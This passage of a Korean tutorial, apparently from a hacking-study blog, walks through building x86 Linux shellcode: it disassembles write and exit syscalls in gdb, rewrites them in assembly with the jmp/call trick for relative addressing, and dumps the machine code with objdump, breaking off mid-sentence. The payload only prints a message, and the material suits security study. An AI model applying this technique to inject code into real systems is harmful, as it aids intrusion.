\/>Null@Root\"\ub97c \ucd9c\ub825\ud558\ub294 \uac04\ub2e8\ud55c C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc774\ub2e4.&nbsp; <br \/><br \/>[willy@Null@Root]$ cat test21.c <br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; write(1,\"I'm Willy in Null@Root\\n\",23); <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test21.c -o test21 -mpreferred-stack-boundary=2 -static <br \/>\uc5ec\uae30\uc11c -static \uc635\uc158\uc744 \uc4f4 \uc774\uc720\ub294 \uc778\ud130\ub7fd\ud2b8 \ubd80\ubd84\uc744 \ubcf4\uae30 \uc704\ud574\uc11c\uc774\ub2e4. <br \/><br \/>[willy@Null@Root]$ .\/test21 <br \/>I'm Willy in Null@Root <br \/><br \/>[willy@Null@Root]$ gdb -q test21 <br \/>(gdb) disassemble main <br \/>Dump of assembler code for function main: <br \/>0x80481dc &lt;main&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebp <br \/>0x80481dd &lt;main+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; %esp,%ebp <br \/>0x80481df &lt;main+3&gt;: &nbsp; &nbsp; push &nbsp; $0x17 <br \/>0x80481e1 &lt;main+5&gt;: &nbsp; &nbsp; push &nbsp; $0x808b1c8 <br \/>0x80481e6 &lt;main+10&gt;: &nbsp;&nbsp; push &nbsp; $0x1 <br \/>0x80481e8 &lt;main+12&gt;: &nbsp;&nbsp; call &nbsp; 0x804c390 &lt;__libc_write&gt; <br \/>0x80481ed &lt;main+17&gt;: &nbsp;&nbsp; add &nbsp;&nbsp; $0xc,%esp <br \/>0x80481f0 &lt;main+20&gt;: &nbsp;&nbsp; leave &nbsp; <br \/>0x80481f1 &lt;main+21&gt;: &nbsp;&nbsp; ret &nbsp; &nbsp; <br \/>0x80481f2 &lt;main+22&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>0x80481f3 &lt;main+23&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>End of assembler dump. <br \/>(gdb) disassemble __libc_write <br \/>Dump of assembler code for function __libc_write: <br \/>0x804c390 &lt;__libc_write&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebx <br \/>0x804c391 &lt;__libc_write+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; 0x10(%esp,1),%edx <br \/>0x804c395 &lt;__libc_write+5&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; 0xc(%esp,1),%ecx <br \/>0x804c399 &lt;__libc_write+9&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; 0x8(%esp,1),%ebx <br \/>0x804c39d &lt;__libc_write+13&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; $0x4,%eax <br \/>0x804c3a2 &lt;__libc_write+18&gt;: &nbsp;&nbsp; int &nbsp;&nbsp; $0x80 <br \/>0x804c3a4 &lt;__libc_write+20&gt;: &nbsp;&nbsp; pop &nbsp;&nbsp; %ebx <br \/>0x804c3a5 &lt;__libc_write+21&gt;: &nbsp;&nbsp; cmp &nbsp;&nbsp; $0xfffff001,%eax <br \/>0x804c3aa &lt;__libc_write+26&gt;: &nbsp;&nbsp; jae &nbsp;&nbsp; 0x804cab0 &lt;__syscall_error&gt; <br \/>0x804c3b0 &lt;__libc_write+32&gt;: &nbsp;&nbsp; ret &nbsp; &nbsp; <br \/>End of assembler dump. <br \/><br \/>disassemble main\uc744 \ubcf4\uba74 ebp\ub97c \uc124\uc815\ud558\uace0, 0x17(string\ud06c\uae30), string address, 1(std_out)\uc744 stack <br \/>\uc73c\ub85c \ub123\uc740 \ub4a4 call\uc744 \ud558\ub294 \uac83\uc744 \ubcfc\uc218 \uc788\ub2e4. \uc774\ub294 \uc704\uc5d0\uc11c \uc124\uba85\ud588\ub358 \uac83\ucc98\ub7fc \ud568\uc218\ub97c call\ud558\uae30 \uc804\uc5d0 <br \/>\uc778\uc218\ub4e4\uc744 \ub9e8 \ub4b7\uac70 \ubd80\ud130 stack\uc5d0 \ub123\ub294 \uac83\uc744 \uc54c\uc218 \uc788\ub2e4. disassemble __libc_write\ub97c \ubcf4\uba74 \uc21c\uc11c\uac00&nbsp; <br \/>\ub2e4\ub974\ub354\ub77c\ub3c4 eax, ebx, ecx, edx\uc5d0 data\uac00 \ub4e4\uc5b4\uac04\ub4a4 int $0x80\uc73c\ub85c system call\uc744 \ud558\ub294\uac83\uc744 \uc54c\uc218&nbsp; <br \/>\uc788\ub2e4. \uadf8\ub7fc eax, ebx, ecx, edx\uc5d0 \uc5b4\ub5a4 \uac12\uc774 \ucc44\uc6cc\uc9c0\ub294\uc9c0 \ubcf4\uae30\ub85c \ud558\uc790.. &nbsp; <br \/><br \/>0x804c391 &lt;__libc_write+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; 0x10(%esp,1),%edx&nbsp; \uc774 \uc704\uce58\uc5d0\uc11c stack\uc5d0 \uc313\uc5ec\uc788\ub294 data\ub97c <br \/>\ubcf4\uba74. <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %ebx &nbsp; | &nbsp; &lt;--- %esp \uac12 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; (\ub0ae\uc740 \uc8fc\uc18c) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; ret &nbsp;&nbsp; | &nbsp;&nbsp; %esp + 0x04 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; 0x1 &nbsp;&nbsp; | &nbsp;&nbsp; %esp + 0x08 &nbsp;&nbsp; ---&gt; %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; |string\uc8fc\uc18c| &nbsp;&nbsp; %esp + 0x0c &nbsp;&nbsp; ---&gt; %ecx &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | 0x17(23) | &nbsp;&nbsp; %esp + 0x10 &nbsp;&nbsp; ---&gt; %edx &nbsp; &nbsp; &nbsp; (\ub192\uc740 \uc8fc\uc18c) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/><br \/>eax,ebx,ecx,edx\uc5d0\ub294 \uc544\ub798\uc640 \uac19\uc740 data\uac00 \ub4e4\uc5b4\uac04\ub4a4 \uc778\ud130\ub7fd\ud2b8(int $0x80)\uac00 \ub418\ub294 \uac83\uc744 \uc54c\uc218\uc788\ub2e4. <br \/>&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %eax &nbsp; | &nbsp; 0x04 &nbsp; |&nbsp; write()\ub97c \uc758\ubbf8\ud558\ub294 system call no.&nbsp; |&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %ebx &nbsp; | &nbsp; 0x01 &nbsp; |&nbsp; STANDARD_OUT\uc758 \uc758\ubbf8 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %ecx &nbsp; | str addr |&nbsp; string\uc758 \uc8fc\uc18c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %edx &nbsp; | &nbsp; 0x17 &nbsp; |&nbsp; string\uc758 size &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; int $0x80 &nbsp; &nbsp;&nbsp; |&nbsp; system call \ud638\ucd9c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------------+--------------------------------------+ <br \/><br \/>\uc774\uc81c \uc774 \uacb0\uacfc\ub97c \uc774\uc6a9\ud558\uc5ec \uac04\ub2e8\ud558\uac8c \uc704\uc758 \uae00\uc790\ub97c \ucd9c\ub825\ud558\ub294 \ud504\ub85c\uadf8\ub7a8\uc744 \uc5b4\uc148\ube14\ub9ac\ub85c \uc791\uc131\ud574 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test22.s <br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"I'm Willy in Null@Root\\n\"&nbsp; <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x04, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $.LC0, %ecx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x17, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/><br \/>[willy@Null@Root]$ gcc test22.s -o test22 <br \/><br \/>[willy@Null@Root]$ .\/test22 <br \/>I'm Willy in Null@Root <br \/>\uc138\uadf8\uba58\ud14c\uc774\uc158 \uc624\ub958 (core dumped) <br \/><br \/>\uc77c\ub2e8 write()\ud568\uc218\ub97c system call\ud558\uc5ec \ubb38\uc790\ub97c \ucd9c\ub825\ud558\ub294\ub370\ub294 \uc131\uacf5\ud588\ub2e4.. \uadf8\ub7f0\ub370 \uadf8\ub4a4\uc5d0 \uc138\ud06c\uba58\ud14c\uc774\uc158 <br \/>\uc624\ub958\uac00 \ubc1c\uc0dd\ud558\ub294 \ubb38\uc81c\uac00 \uc788\uc74c\ub97c \ubcfc\uc218 \uc788\uc73c\uba70, \uc774\ub294 \ud504\ub85c\uadf8\ub7a8\uc758 \uc885\ub8cc\uc2dc\uc5d0 \ud504\ub85c\uadf8\ub7a8\uc758 \uc790\uc6d0\uc744 \ub9b4\ub9ac\uc988 <br \/>\ud558\ub294 \ubcc4\ub3c4\uc758 \ub8e8\ud2f4\uc774 \uc124\uc815\ub418\uc9c0 \uc54a\uc558\uae30 \ub54c\ubb38\uc774\ub2e4. \ub530\ub77c\uc11c \uc774\ub97c \ud574\uacb0\ud558\uae30 \uc704\ud574 exit() \uc2dc\uc2a4\ud15c\ucf5c\uc744 \ud638\uc904 <br \/>\ud574 \uc918\uc57c\ud55c\ub2e4. \uadf8 \uc758\ubbf8\ub294 1\ucc28\uc801\uc73c\ub85c \uc778\ud130\ub7fd\ud2b8\ub97c \uc218\ud589\ud558\uc5ec write()\ub97c call\ud558\uace0 \ud504\ub85c\uadf8\ub7a8 \uc885\ub8cc\uc804 \ub610&nbsp; <br \/>\ud55c\ubc88\uc5d0 \uc778\ud130\ub7fd\ud2b8\ub85c exit()\uc744 \uc218\ud589 \uc815\uc0c1\uc801\uc778 \uc885\ub8cc\uac00 \ub418\ub3c4\ub85d\ud558\ub294 \uac83\uc774\ub2e4. \uc774\uac83\uc740 \ud55c \ud504\ub85c\uadf8\ub7a8\uc5d0\uc11c \uba87\uac1c <br \/>\uc758 system call\uc744 \ud560\uc218 \uc788\uc74c\uc744 \uc758\ubbf8\ud558\uae30\ub3c4 \ud55c\ub2e4. \uadf8\ub7fc exit() system call\uc2dc \ud544\uc694\ud55c \uc778\uc218\ub4e4\uc744 \uc54c\uc544 <br \/>\ubcf4\uae30 \uc704\ud558\uc5ec \uc544\ub798\uc640 \uac19\uc774 \uac04\ub2e8\ud55c C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc744 \uc791\uc131\ud55c\ub4a4 gdb\ub85c \ub0b4\uc6a9\ub97c \uc0b4\ud3b4\ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test3.c <br \/>main() <br \/>{ <br \/>exit(0); <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test3.c -o test3 -mpreferred-stack-boundary=2 -static <br \/><br \/>[willy@Null@Root]$ gdb -q test3 <br \/>(gdb) disassemble main <br \/>Dump of assembler code for function main: <br \/>0x80481dc &lt;main&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebp <br \/>0x80481dd &lt;main+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; %esp,%ebp <br \/>0x80481df &lt;main+3&gt;: &nbsp; &nbsp; push &nbsp; $0x0 <br \/>0x80481e1 &lt;main+5&gt;: &nbsp; &nbsp; call &nbsp; 0x80483a4 &lt;exit&gt; <br \/>0x80481e6 &lt;main+10&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>0x80481e7 &lt;main+11&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>End of assembler dump. <br \/>(gdb) disassemble _exit <br \/>Dump of assembler code for function _exit: <br \/>0x804c330 &lt;_exit&gt;: &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %ebx,%edx <br \/>0x804c332 &lt;_exit+2&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; 0x4(%esp,1),%ebx <br \/>0x804c336 &lt;_exit+6&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; $0x1,%eax <br \/>0x804c33b &lt;_exit+11&gt;: &nbsp; int &nbsp;&nbsp; $0x80 <br \/>0x804c33d &lt;_exit+13&gt;: &nbsp; mov &nbsp;&nbsp; %edx,%ebx <br \/>0x804c33f &lt;_exit+15&gt;: &nbsp; cmp &nbsp;&nbsp; $0xfffff001,%eax <br \/>0x804c344 &lt;_exit+20&gt;: &nbsp; jae &nbsp;&nbsp; 0x804ca70 &lt;__syscall_error&gt; <br \/>End of assembler dump. <br \/>(gdb)&nbsp; <br \/><br \/>_exit\ub85c \ubd80\ud130 %eax = 1, %ebx = 0 \uc124\uc815\ud6c4 int $0x80\uc744 \ud558\uba74 exit(0) \uacb0\uacfc\ub97c \uc5bb\uc744\uc218 \uc788\ub2e4.&nbsp; <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x01, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x00, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp; &nbsp; $0x80 <br \/><br \/>\uc774\ubd80\ubd84\uc744 \ucd94\uac00 \ud558\uba74 exit(0)\uc774 system call\ub418\ub294 \uac83\uc744 \uc54c\uc218 \uc788\ub2e4. \uadf8\ub7fc \uc774\uac83\uc744 test22.s\uc5d0 \ucd94\uac00\ud558\uc5ec <br \/>\uc2e4\ud589\ud574 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test23.s <br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"I'm Willy in Null@Root\\n\"&nbsp; <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x04, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $.LC0, %ecx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x17, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;---&nbsp; write()\ub97c \uc704\ud55c \uc778\ud130\ub7fd\ud2b8 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x00, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;---&nbsp; exit(0)\uc744 \uc704\ud55c \uc778\ud130\ub7fd\ud2b8&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/><br \/>[willy@Null@Root]$ cc test23.s -o test23 <br \/><br \/>[willy@Null@Root]$ .\/test23 <br \/>I'm Willy in Null@Root <br \/><br \/>\uc774\uc81c \uc885\ub8cc\ubb38\uc81c\ub97c \ud574\uacb0\ud558\uc600\ub2e4. \ub9cc\uc57d \uc774\uac83\uc744 Shellcode\ucc98\ub7fc \uae30\uacc4\uc5b4\ucf54\ub4dc\ub85c \ubc14\uafb8\uc5b4 Buffer\uc5d0 \ub123\uc5d0 \uc2e4\ud589 <br \/>\uc2dc\ud0ac\ub824\uace0 \ud558\uba74 \uc5b4\ub5a4 \ubb38\uc81c\uac00 \uc788\uc744\uae4c?&nbsp; \ubc14\ub85c string\uc758 \uc8fc\uc18c\uac00 \ubb38\uc81c\uc774\ub2e4. \uc5ec\uae30\uc11c\ub294 string\uc774 \uc808\ub300\uc8fc\uc18c <br \/>\ub85c \uc124\uc815\ud558\uc600\ub294\ub370 \uc774 \uc808\ub300\uc8fc\uc18c\ub294 \uc784\uc758\uc758 Buffer\uc5d0 \ub123\uc5b4\uc9c0\uba74 \uc544\ubb34\ub7f0 \uad00\uacc4\uac00 \uc5c6\uc5b4 string\uc744 \ucc3e\uc744\uc218&nbsp; <br \/>\uc5c6\ub2e4. \uadf8\ub7ec\ubbc0\ub85c&nbsp; \uae30\uacc4\uc5b4\ucf54\ub4dc \ub0b4\uc5d0\uc11c \uc8fc\uc18c\ub97c \ucc3e\uc744\uc218 \uc788\ub3c4\ub85d \uc0c1\ub300\uc8fc\uc18c\ub85c \ub9cc\ub4e4\uc5b4 \uc8fc\uc5b4\uc57c \ud55c\ub2e4. \uadf8\ub7ec\uba74 <br \/>\uc0c1\ub300\uc8fc\uc18c\uac00 \ub418\ub3c4\ub85d \ud558\ub824\uba74? \uc544\ub798 test24.s\uc640 \uac19\uc774 jmp \uc640 call\ub97c \uc0ac\uc6a9\ud558\uc5ec \uc815\uc758\ud574 \uc8fc\uba74 \ub41c\ub2e4. <br \/><br \/>[willy@Null@Root]$ cat test24.s <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp; &nbsp; strings <br \/>start:&nbsp; popl &nbsp;&nbsp; %esi <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x04, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esi, %ecx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x17, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x00, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>strings:call &nbsp;&nbsp; start <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"I'm Willy in Null@Root\\n\"&nbsp; <br \/><br \/>\uc704\uc758 test23.s\uc640 \uc5b4\ub5bb\uac8c \ubc14\ub00c\uc5c8\ub294\uc9c0 \ubcf4\uc790.&nbsp; \uc704\ucabd\uc5d0 jmp strings\uc640 start: popl %esi\uac00 \ucd94\uac00\ub418\uc5c8\uace0 <br \/>\uc911\uac04\uc5d0 \ubcf4\uba74 $.LC0\uac00 %esi\ub85c, \uc544\ub798\ucabd\uc5d0 strings: call start\uac00 \ucd94\uac00 \ub418\uc5c8\uc73c\uba70, \ubb38\uc790\uc5f4\uc774 \uc544\ub798\ub85c&nbsp; <br \/>\ub0b4\ub824\uc654\ub2e4.&nbsp; \uc774 \ud504\ub85c\uadf8\ub7a8\uc758 \uc218\ud589 \uc21c\uc11c\ub97c \ub530\ub77c\uc11c \ub0b4\uc6a9\ub97c \uc0b4\ud3b4\ubcf4\uc790. <br \/><br \/>&nbsp; &nbsp; &nbsp; step 1: \ucc98\uc74c jmp\ub97c \ub9cc\ub098\uc11c strings:\ub85c \uc774\ub3d9&nbsp; <br \/>&nbsp; &nbsp; &nbsp; step 2: strings:\uc5d0 call\uc740 \ub2e4\uc74c\uc704\uce58\uc778 \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c stack\uc5d0 \uc800\uc7a5\ud55c\ub4a4 start\ub85c \uc774\ub3d9 <br \/>&nbsp; &nbsp; &nbsp; step 3: start:\uc5d0 popl %esi\uc740 \ub9c8\uc9c0\ub9c9\uc5d0 stack\uc5d0 \uc800\uc7a5\ud55c \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c %esi\uc5d0 \ub123\ub294\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; step 4: movl\ub97c \ud1b5\ud574\uc11c %eax,%ebx,%ecx,%edx\uc744 \ucc44\uc6b4\ub2e4. \uc774\ub54c %ecx\uc5d0 %esi(\ubb38\uc790\uc5f4\uc8fc\uc18c)\uac00 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \ub4e4\uc5b4\uac04\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; step 5: int $0x80\uc73c\ub85c write() \ud568\uc218 \uc2e4\ud589\uc744 \uc704\ud55c system call\uc744 \ud55c\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; step 6: movl\ub85c %eax, %ebx\ub97c \ucc44\uc6b4\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; step 7: int %0x80\uc73c\ub85c exit(0)\ud568\uc218\ub97c system call\ud55c\ub2e4. (\uc815\uc0c1\uc885\ub8cc) <br \/><br \/>[willy@Null@Root]$ gcc test24.s -o test24 <br \/>[willy@Null@Root]$ .\/test24 <br \/>I'm Willy in Null@Root <br \/><br \/>\uc815\uc0c1\uc801\uc73c\ub85c \uc2e4\ud589\ub41c\ub294 \uac83\uc744 \ud655\uc778\ud558\uc600\ub2e4. \uc774\uc81c\ub294 objdump\ub97c \uc774\uc6a9\ud558\uc5ec \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ objdump -d test24 <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>0804841c &lt;main&gt;: <br \/>804841c: &nbsp; &nbsp; &nbsp; eb 20 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp;&nbsp; 804843e &lt;strings&gt; <br \/><br \/>0804841e &lt;start&gt;: <br \/>804841e: &nbsp; &nbsp; &nbsp; 5e &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %esi <br \/>804841f: &nbsp; &nbsp; &nbsp; b8 04 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x4,%eax <br \/>8048424: &nbsp; &nbsp; &nbsp; bb 01 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x1,%ebx <br \/>8048429: &nbsp; &nbsp; &nbsp; 89 f1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; %esi,%ecx <br \/>804842b: &nbsp; &nbsp; &nbsp; ba 17 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x17,%edx <br \/>8048430: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/>8048432: &nbsp; &nbsp; &nbsp; b8 01 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x1,%eax <br \/>8048437: &nbsp; &nbsp; &nbsp; bb 00 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x0,%ebx <br \/>804843c: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/><br \/>0804843e &lt;strings&gt;: <br \/>804843e: &nbsp; &nbsp; &nbsp; e8 db ff ff ff &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 804841e &lt;start&gt; <br \/>8048443: &nbsp; &nbsp; &nbsp; 49 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; dec &nbsp;&nbsp; %ecx <br \/>8048444: &nbsp; &nbsp; &nbsp; 27 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; daa &nbsp; &nbsp; <br \/>8048445: &nbsp; &nbsp; &nbsp; 6d &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insl &nbsp; (%dx),%es:(%edi) <br \/>8048446: &nbsp; &nbsp; &nbsp; 20 57 69 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; and &nbsp;&nbsp; %dl,0x69(%edi) <br \/>8048449: &nbsp; &nbsp; &nbsp; 6c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insb &nbsp; (%dx),%es:(%edi) <br \/>804844a: &nbsp; &nbsp; &nbsp; 6c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insb &nbsp; (%dx),%es:(%edi) <br \/>804844b: &nbsp; &nbsp; &nbsp; 79 20 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jns &nbsp;&nbsp; 804846d &lt;__do_global_ctors_aux+0xd&gt; <br \/>804844d: &nbsp; &nbsp; &nbsp; 69 6e 20 4e 75 6c 6c &nbsp;&nbsp; imul &nbsp; $0x6c6c754e,0x20(%esi),%ebp <br \/>8048454: &nbsp; &nbsp; &nbsp; 40 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; inc &nbsp;&nbsp; %eax <br \/>8048455: &nbsp; &nbsp; &nbsp; 52 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %edx <br \/>8048456: &nbsp; &nbsp; &nbsp; 6f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; outsl&nbsp; %ds:(%esi),(%dx) <br \/>8048457: &nbsp; &nbsp; &nbsp; 6f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; outsl&nbsp; %ds:(%esi),(%dx) <br \/>8048458: &nbsp; &nbsp; &nbsp; 74 0a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; je &nbsp; &nbsp; 8048464 &lt;__do_global_ctors_aux+0x4&gt; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : <br \/><br \/>\uc704\uc758 \ucf54\ub4dc\ub97c jmp(0x0804841c)\ubd80\ud130 call(0x080443e)\uae4c\uc9c0 \uc21c\uc11c\ub300\ub85c \uc815\ub82c\uc2dc\ucf1c \ubcf4\uba74 0xeb\\x20...&nbsp; <br \/>.... \\xff\\xff\\xff\uac00 \ub418\uba70 \uadf8\ub4a4\uc5d0 \\x49 ~ \\x0a\ub294 \ubb38\uc790\uc5f4\uc774\ubbc0\ub85c \uc9c1\uc811 \ubb38\uc790\ub97c \ucd94\uac00\ud558\uc5ec \uc791\uc131\ud558\uba74 <br \/>\uc544\ub798\uc640 \uac19\uc740 